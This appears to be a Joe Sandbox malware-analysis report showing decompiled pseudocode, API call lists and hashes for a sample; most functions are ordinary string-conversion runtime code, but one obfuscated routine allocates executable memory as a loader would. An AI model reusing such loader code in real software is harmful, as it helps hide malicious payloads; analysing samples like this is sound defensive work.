                                                                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                                                                                                                                                                                                            						_t81 = 0;
                                                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                                                            						if(_t81 == 0) {
                                                                                                                                                                                                                                                                            							L36:
                                                                                                                                                                                                                                                                            							_t105 = 0;
                                                                                                                                                                                                                                                                            							L37:
                                                                                                                                                                                                                                                                            							E0037A83B(_t81);
                                                                                                                                                                                                                                                                            							goto L38;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                                                                                                                                                                                                            						_t121 = _t58;
                                                                                                                                                                                                                                                                            						if(_t58 == 0) {
                                                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t100 = _v12;
                                                                                                                                                                                                                                                                            						_t60 = E0037AC09(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                            						_t105 = _t60;
                                                                                                                                                                                                                                                                            						if(_t105 == 0) {
                                                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if((_a12 & 0x00000400) == 0) {
                                                                                                                                                                                                                                                                            							_t96 = _t105 + _t105;
                                                                                                                                                                                                                                                                            							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                                            							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                            							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            							__eflags = _t87 & _t60;
                                                                                                                                                                                                                                                                            							if((_t87 & _t60) == 0) {
                                                                                                                                                                                                                                                                            								_t101 = 0;
                                                                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                                                            								__eflags = _t101;
                                                                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                                                            									E0037A83B(_t101);
                                                                                                                                                                                                                                                                            									goto L36;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t62 = E0037AC09(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                                                                                                                                                                                                            								__eflags = _t62;
                                                                                                                                                                                                                                                                            								if(_t62 == 0) {
                                                                                                                                                                                                                                                                            									goto L35;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                                                            								__eflags = _a28;
                                                                                                                                                                                                                                                                            								if(_a28 != 0) {
                                                                                                                                                                                                                                                                            									_push(_a28);
                                                                                                                                                                                                                                                                            									_push(_a24);
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                                                                                                                                                                                                            								__eflags = _t105;
                                                                                                                                                                                                                                                                            								if(_t105 != 0) {
                                                                                                                                                                                                                                                                            									E0037A83B(_t101);
                                                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									goto L35;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t90 = _t96 + 8;
                                                                                                                                                                                                                                                                            							__eflags = _t96 - _t90;
                                                                                                                                                                                                                                                                            							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            							_t66 = _t60 & _t90;
                                                                                                                                                                                                                                                                            							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                                            							__eflags = _t66 - 0x400;
                                                                                                                                                                                                                                                                            							if(_t66 > 0x400) {
                                                                                                                                                                                                                                                                            								__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            								_t101 = E0037BF3C(_t87, _t66 & _t87);
                                                                                                                                                                                                                                                                            								_pop(_t87);
                                                                                                                                                                                                                                                                            								__eflags = _t101;
                                                                                                                                                                                                                                                                            								if(_t101 == 0) {
                                                                                                                                                                                                                                                                            									goto L35;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *_t101 = 0xdddd;
                                                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                                                            								_t101 =  &(_t101[4]);
                                                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                            							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            							E0037E490();
                                                                                                                                                                                                                                                                            							_t101 = _t107;
                                                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                                                            							if(_t101 == 0) {
                                                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							 *_t101 = 0xcccc;
                                                                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t70 = _a28;
                                                                                                                                                                                                                                                                            						if(_t70 == 0) {
                                                                                                                                                                                                                                                                            							goto L37;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t125 = _t105 - _t70;
                                                                                                                                                                                                                                                                            						if(_t105 > _t70) {
                                                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t71 = E0037AC09(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                                                                                                                                                                                                            						_t105 = _t71;
                                                                                                                                                                                                                                                                            						if(_t71 != 0) {
                                                                                                                                                                                                                                                                            							goto L37;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            					_t72 = _t54 & _t95 + 0x00000008;
                                                                                                                                                                                                                                                                            					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                                            					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                                            						__eflags = _t95 - _t85;
                                                                                                                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            						_t81 = E0037BF3C(_t85, _t72 & _t85);
                                                                                                                                                                                                                                                                            						_pop(_t85);
                                                                                                                                                                                                                                                                            						__eflags = _t81;
                                                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *_t81 = 0xdddd;
                                                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                                                            						_t81 =  &(_t81[4]);
                                                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            					E0037E490();
                                                                                                                                                                                                                                                                            					_t81 = _t107;
                                                                                                                                                                                                                                                                            					if(_t81 == 0) {
                                                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *_t81 = 0xcccc;
                                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                                                                            0x0037ca4e
                                                                                                                                                                                                                                                                            0x0037ca4f
                                                                                                                                                                                                                                                                            0x0037ca50
                                                                                                                                                                                                                                                                            0x0037ca57
                                                                                                                                                                                                                                                                            0x0037ca5b
                                                                                                                                                                                                                                                                            0x0037ca5c
                                                                                                                                                                                                                                                                            0x0037ca62
                                                                                                                                                                                                                                                                            0x0037ca68
                                                                                                                                                                                                                                                                            0x0037ca6e
                                                                                                                                                                                                                                                                            0x0037ca71
                                                                                                                                                                                                                                                                            0x0037ca71
                                                                                                                                                                                                                                                                            0x0037ca74
                                                                                                                                                                                                                                                                            0x0037ca76
                                                                                                                                                                                                                                                                            0x0037ca76
                                                                                                                                                                                                                                                                            0x0037ca74
                                                                                                                                                                                                                                                                            0x0037ca78
                                                                                                                                                                                                                                                                            0x0037ca7d
                                                                                                                                                                                                                                                                            0x0037ca84
                                                                                                                                                                                                                                                                            0x0037ca87
                                                                                                                                                                                                                                                                            0x0037ca87
                                                                                                                                                                                                                                                                            0x0037caa3
                                                                                                                                                                                                                                                                            0x0037caa9
                                                                                                                                                                                                                                                                            0x0037caae
                                                                                                                                                                                                                                                                            0x0037cc41
                                                                                                                                                                                                                                                                            0x0037cc54
                                                                                                                                                                                                                                                                            0x0037cab4
                                                                                                                                                                                                                                                                            0x0037cab4
                                                                                                                                                                                                                                                                            0x0037cab7
                                                                                                                                                                                                                                                                            0x0037cabc
                                                                                                                                                                                                                                                                            0x0037cac0
                                                                                                                                                                                                                                                                            0x0037cb14
                                                                                                                                                                                                                                                                            0x0037cb14
                                                                                                                                                                                                                                                                            0x0037cb16
                                                                                                                                                                                                                                                                            0x0037cb18
                                                                                                                                                                                                                                                                            0x0037cc36
                                                                                                                                                                                                                                                                            0x0037cc36
                                                                                                                                                                                                                                                                            0x0037cc38
                                                                                                                                                                                                                                                                            0x0037cc39
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cc3f
                                                                                                                                                                                                                                                                            0x0037cb29
                                                                                                                                                                                                                                                                            0x0037cb2f
                                                                                                                                                                                                                                                                            0x0037cb31
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cb37
                                                                                                                                                                                                                                                                            0x0037cb49
                                                                                                                                                                                                                                                                            0x0037cb4e
                                                                                                                                                                                                                                                                            0x0037cb52
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cb5f
                                                                                                                                                                                                                                                                            0x0037cb99
                                                                                                                                                                                                                                                                            0x0037cb9c
                                                                                                                                                                                                                                                                            0x0037cb9f
                                                                                                                                                                                                                                                                            0x0037cba1
                                                                                                                                                                                                                                                                            0x0037cba3
                                                                                                                                                                                                                                                                            0x0037cba5
                                                                                                                                                                                                                                                                            0x0037cbf1
                                                                                                                                                                                                                                                                            0x0037cbf1
                                                                                                                                                                                                                                                                            0x0037cbf3
                                                                                                                                                                                                                                                                            0x0037cbf3
                                                                                                                                                                                                                                                                            0x0037cbf5
                                                                                                                                                                                                                                                                            0x0037cc2f
                                                                                                                                                                                                                                                                            0x0037cc30
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cc35
                                                                                                                                                                                                                                                                            0x0037cc09
                                                                                                                                                                                                                                                                            0x0037cc0e
                                                                                                                                                                                                                                                                            0x0037cc10
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cc14
                                                                                                                                                                                                                                                                            0x0037cc15
                                                                                                                                                                                                                                                                            0x0037cc16
                                                                                                                                                                                                                                                                            0x0037cc19
                                                                                                                                                                                                                                                                            0x0037cc55
                                                                                                                                                                                                                                                                            0x0037cc58
                                                                                                                                                                                                                                                                            0x0037cc1b
                                                                                                                                                                                                                                                                            0x0037cc1b
                                                                                                                                                                                                                                                                            0x0037cc1c
                                                                                                                                                                                                                                                                            0x0037cc1c
                                                                                                                                                                                                                                                                            0x0037cc29
                                                                                                                                                                                                                                                                            0x0037cc2b
                                                                                                                                                                                                                                                                            0x0037cc2d
                                                                                                                                                                                                                                                                            0x0037cc5e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cc2d
                                                                                                                                                                                                                                                                            0x0037cba7
                                                                                                                                                                                                                                                                            0x0037cbaa
                                                                                                                                                                                                                                                                            0x0037cbac
                                                                                                                                                                                                                                                                            0x0037cbae
                                                                                                                                                                                                                                                                            0x0037cbb0
                                                                                                                                                                                                                                                                            0x0037cbb3
                                                                                                                                                                                                                                                                            0x0037cbb8
                                                                                                                                                                                                                                                                            0x0037cbd3
                                                                                                                                                                                                                                                                            0x0037cbd5
                                                                                                                                                                                                                                                                            0x0037cbdf
                                                                                                                                                                                                                                                                            0x0037cbe1
                                                                                                                                                                                                                                                                            0x0037cbe2
                                                                                                                                                                                                                                                                            0x0037cbe4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cbe6
                                                                                                                                                                                                                                                                            0x0037cbec
                                                                                                                                                                                                                                                                            0x0037cbec
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cbec
                                                                                                                                                                                                                                                                            0x0037cbba
                                                                                                                                                                                                                                                                            0x0037cbbc
                                                                                                                                                                                                                                                                            0x0037cbc0
                                                                                                                                                                                                                                                                            0x0037cbc5
                                                                                                                                                                                                                                                                            0x0037cbc7
                                                                                                                                                                                                                                                                            0x0037cbc9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cbcb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cbcb
                                                                                                                                                                                                                                                                            0x0037cb61
                                                                                                                                                                                                                                                                            0x0037cb66
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cb6c
                                                                                                                                                                                                                                                                            0x0037cb6e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cb85
                                                                                                                                                                                                                                                                            0x0037cb8a
                                                                                                                                                                                                                                                                            0x0037cb8e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cb94
                                                                                                                                                                                                                                                                            0x0037cac7
                                                                                                                                                                                                                                                                            0x0037cac9
                                                                                                                                                                                                                                                                            0x0037cacb
                                                                                                                                                                                                                                                                            0x0037cad3
                                                                                                                                                                                                                                                                            0x0037caf2
                                                                                                                                                                                                                                                                            0x0037caf4
                                                                                                                                                                                                                                                                            0x0037cafe
                                                                                                                                                                                                                                                                            0x0037cb00
                                                                                                                                                                                                                                                                            0x0037cb01
                                                                                                                                                                                                                                                                            0x0037cb03
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cb09
                                                                                                                                                                                                                                                                            0x0037cb0f
                                                                                                                                                                                                                                                                            0x0037cb0f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037cb0f
                                                                                                                                                                                                                                                                            0x0037cad7
                                                                                                                                                                                                                                                                            0x0037cadb
                                                                                                                                                                                                                                                                            0x0037cae0
                                                                                                                                                                                                                                                                            0x0037cae4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037caea
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037caea

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,0037CC9A,?,?,00000000), ref: 0037CAA3
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0037CADB
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0037CC9A,?,?,00000000,?,?,?), ref: 0037CB29
                                                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0037CBC0
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0037CC9A,?,?,00000000,?), ref: 0037CC23
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0037CC30
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BF3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0037A7C2,00000000), ref: 0037BF6E
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0037CC39
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 0037CC5E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                            • Opcode ID: b5e8461a026d4ebf8f178248bddaea147eb34ac57598f3cb055910e3655cebc0
                                                                                                                                                                                                                                                                            • Instruction ID: c1a95f0ae68ae1f0a913b5d7ba477482a8056a88b73e60a318804b979c47402b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5e8461a026d4ebf8f178248bddaea147eb34ac57598f3cb055910e3655cebc0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B351C47262021AABDB378E64DC81EAF77A9EB44750B16862DFD0CDA150EB38DC41C651
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 91 371280-3712e7 92 371367-371379 91->92 93 3712e9-371362 VirtualAlloc 91->93 94 371409-371415 92->94 95 37137f-371390 92->95 93->94 96 37139b-3713a6 95->96 96->94 97 3713a8-371407 SetHandleInformation 96->97 97->96
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00371280(signed int _a4, signed int _a8, signed int _a20, signed int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				long _v32;
                                                                                                                                                                                                                                                                            				long _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				long _v48;
                                                                                                                                                                                                                                                                            				long _v52;
                                                                                                                                                                                                                                                                            				void* _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                                                                            				intOrPtr _t136;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v40 = _a20 ^ 0x00002622;
                                                                                                                                                                                                                                                                            				_v28 = _a4 - 0x283a;
                                                                                                                                                                                                                                                                            				_v44 = _a8 - 0x253b;
                                                                                                                                                                                                                                                                            				_v60 = _a8 ^ 0x0000005e;
                                                                                                                                                                                                                                                                            				_v8 = _a24 + 0x261;
                                                                                                                                                                                                                                                                            				_v16 = _a4 ^ 0x0000283a;
                                                                                                                                                                                                                                                                            				_v20 = _a8 ^ 0x0000253b;
                                                                                                                                                                                                                                                                            				_v24 = _a24;
                                                                                                                                                                                                                                                                            				if(_v28 >= _v8 - 0x1d9) {
                                                                                                                                                                                                                                                                            					if(_v40 >= (_v16 ^ 0x00002633 | 0x00002687)) {
                                                                                                                                                                                                                                                                            						_v12 =  *0x0040D498;
                                                                                                                                                                                                                                                                            						while(_v12 <= (_v24 | 0x000026e5)) {
                                                                                                                                                                                                                                                                            							_t78 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t136 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_v56 =  *(_t78 + 0xbadc19) |  *(_t136 + 0xbadc65);
                                                                                                                                                                                                                                                                            							_v52 = (_v20 & _v44) + 0x2598;
                                                                                                                                                                                                                                                                            							_v48 = (_v16 & _v16) -  *0x0040D3D0;
                                                                                                                                                                                                                                                                            							SetHandleInformation(_v56, _v52, _v48);
                                                                                                                                                                                                                                                                            							_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					 *(_a28 + 0x48) = ( *(_a28 + 0xd0) ^  *(_a28 + 0x10c)) +  *(_a28 + 0x48) - 0xe5304;
                                                                                                                                                                                                                                                                            					_v8 = _v8 - 0x269;
                                                                                                                                                                                                                                                                            					_v36 =  *((intOrPtr*)(_a28 + 0xbadbe5)) + 0x6e291e78;
                                                                                                                                                                                                                                                                            					_v32 = 0x40;
                                                                                                                                                                                                                                                                            					_t92 = VirtualAlloc(0,  *(_a28 + 0x48), _v36, _v32); // executed
                                                                                                                                                                                                                                                                            					 *0x40d47c = _t92 + 0x2000;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v24 ^ 0x00000d9a;
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x0037128f
                                                                                                                                                                                                                                                                            0x0037129b
                                                                                                                                                                                                                                                                            0x003712a7
                                                                                                                                                                                                                                                                            0x003712b0
                                                                                                                                                                                                                                                                            0x003712bc
                                                                                                                                                                                                                                                                            0x003712c8
                                                                                                                                                                                                                                                                            0x003712d3
                                                                                                                                                                                                                                                                            0x003712d9
                                                                                                                                                                                                                                                                            0x003712e7
                                                                                                                                                                                                                                                                            0x00371379
                                                                                                                                                                                                                                                                            0x0037138d
                                                                                                                                                                                                                                                                            0x0037139b
                                                                                                                                                                                                                                                                            0x003713b6
                                                                                                                                                                                                                                                                            0x003713bb
                                                                                                                                                                                                                                                                            0x003713cc
                                                                                                                                                                                                                                                                            0x003713db
                                                                                                                                                                                                                                                                            0x003713f2
                                                                                                                                                                                                                                                                            0x00371401
                                                                                                                                                                                                                                                                            0x00371398
                                                                                                                                                                                                                                                                            0x00371398
                                                                                                                                                                                                                                                                            0x0037139b
                                                                                                                                                                                                                                                                            0x003712e9
                                                                                                                                                                                                                                                                            0x00371314
                                                                                                                                                                                                                                                                            0x00371320
                                                                                                                                                                                                                                                                            0x00371337
                                                                                                                                                                                                                                                                            0x0037133a
                                                                                                                                                                                                                                                                            0x00371352
                                                                                                                                                                                                                                                                            0x0037135d
                                                                                                                                                                                                                                                                            0x0037135d
                                                                                                                                                                                                                                                                            0x00371415

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,?,00000040), ref: 00371352
                                                                                                                                                                                                                                                                            • SetHandleInformation.KERNEL32(?,?,?), ref: 00371401
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocHandleInformationVirtual
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 2282314611-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: 303ca23305ce8ffd4e0aa11bf28f8961333bbd0e590801d79846843646d74d70
                                                                                                                                                                                                                                                                            • Instruction ID: ed185cbfc673b5cb7023f8452e75cca8e07c1bce151eff27dc8b1426dea95533
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 303ca23305ce8ffd4e0aa11bf28f8961333bbd0e590801d79846843646d74d70
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5510971E00509DFDB08CF98D994AADB7F5FF88304F50826AE919AB784D738AA41CF44
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 99 37ac09-37ac37 call 37a935 102 37ac60-37ac7a call 37ac91 LCMapStringW 99->102 103 37ac39-37ac5e LCMapStringEx 99->103 107 37ac80-37ac8e call 37de3e 102->107 103->107
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32 ref: 0037AC5C
                                                                                                                                                                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 0037AC7A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String
                                                                                                                                                                                                                                                                            • String ID: LCMapStringEx
                                                                                                                                                                                                                                                                            • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                                                                            • Opcode ID: fa7ee5095720b6ccf30a42dae02e3add84c4c3a4bddd7e2302204b8420cc339c
                                                                                                                                                                                                                                                                            • Instruction ID: 44104f7de1ea109449a5c1ddc2cec5a08a9edc9182c86244ae8ae6806501c6bd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa7ee5095720b6ccf30a42dae02e3add84c4c3a4bddd7e2302204b8420cc339c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B01D332500619BBCF239F90DD06EEE7F66EF4C750F018155FE08A9160CA769931AB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00381F39(void* __ecx) {
                                                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                                                            				WCHAR* _t19;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t14 = __ecx;
